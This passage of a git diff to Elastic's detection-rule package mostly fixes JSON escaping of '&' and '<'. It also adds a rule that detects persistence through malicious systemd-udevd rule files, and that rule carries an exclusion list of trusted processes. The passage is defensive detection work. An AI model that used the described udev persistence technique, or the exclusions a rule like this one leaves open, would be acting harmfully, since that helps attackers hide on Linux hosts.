fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_206.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_206.json index 500c9612ba8..f0751068692 100644 --- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_206.json +++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_206.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "02a4576a-7480-4284-9327-548a806b5e48", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_207.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_207.json index 79064bb8fad..ac2f33deb42 100644 --- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_207.json +++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_207.json @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "02a4576a-7480-4284-9327-548a806b5e48", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_102.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_102.json index 5e0a439390b..494739f1842 100644 --- a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_102.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_103.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_103.json index cda3650dcf5..43ef0c4cf3b 100644 --- a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_104.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_104.json index e9fa702f66e..36659905939 100644 --- a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_105.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_105.json index ab6c3ab9368..84209918a69 100644 --- a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_101.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_101.json index e43646dba83..83fe82eff80 100644 --- a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_101.json +++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_101.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_102.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_102.json index 18b47600d76..9cdbf9bf111 100644 --- a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_104.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_104.json index 9c05bc941e4..506b4b7e7b2 100644 --- a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_105.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_105.json index 8a50c1ab0bd..9aa6ab6a7ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_105.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_106.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_106.json index 854eecf6da1..3e6d25f384e 100644 --- a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_106.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_1.json b/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_1.json index e3d75666442..97ca3e4743d 100644 --- a/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_1.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_2.json b/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_2.json index a0e1cd89900..3b6a498cde4 100644 --- a/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_2.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_1.json b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_1.json index ded087d28cf..2d460f59efc 100644 --- a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_1.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_2.json b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_2.json index c327efded64..87e3b95063d 100644 --- a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_2.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_103.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_103.json index 2c767312374..6c1838f53fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_103.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_104.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_104.json index 12e39841bb4..2c4c6513992 100644 --- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_104.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_105.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_105.json index fae3430f477..ac05dc66e4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_105.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_106.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_106.json index 175c2ab86b9..c9396395ed3 100644 --- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_106.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_107.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_107.json index 5470b8fdedf..edf5ee31a66 100644 --- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_107.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_101.json b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_101.json index dc787f59856..379b648062c 100644 --- a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_101.json +++ b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_102.json b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_102.json index 0c9f4a87578..ac7887310a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_104.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_104.json index c545810fb40..1cecd1d73a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_104.json +++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_104.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_105.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_105.json index 9d0f1ee817b..b3aa81388f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_105.json +++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_105.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_106.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_106.json index c1d1f89418f..a678376659b 100644 --- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_106.json +++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_106.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_107.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_107.json index bc51dd7ab9f..f5e1fae5431 100644 --- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_107.json +++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_107.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_108.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_108.json index aef7bfa476b..598a0580256 100644 --- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_108.json +++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_108.json @@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_1.json b/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_1.json new file mode 100644 index 00000000000..0ba01e5709d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_1.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors for the creation of rule files that are used by systemd-udevd to manage device nodes and handle kernel device events in the Linux operating system. Systemd-udevd can be exploited for persistence by adversaries by creating malicious udev rules that trigger on specific events, executing arbitrary commands or payloads whenever a certain device is plugged in or recognized by the system.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through Systemd-udevd", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "query": "host.os.type:\"linux\" and event.category:\"file\" and \nevent.type:(\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and \nfile.path:/lib/udev/* and process.executable:* and not (\n process.name:(\"dockerd\" or \"docker\" or \"dpkg\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"systemd-hwdb\" or\n \"podman\" or \"buildah\") or file.extension : (\"swp\" or \"swpx\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "054db96b-fd34-43b3-9af2-587b3bd33964", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "type": "new_terms", + "version": 1 + }, + "id": "054db96b-fd34-43b3-9af2-587b3bd33964_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_104.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_104.json index 77be5f18e17..4232203be71 100644 --- a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_104.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - 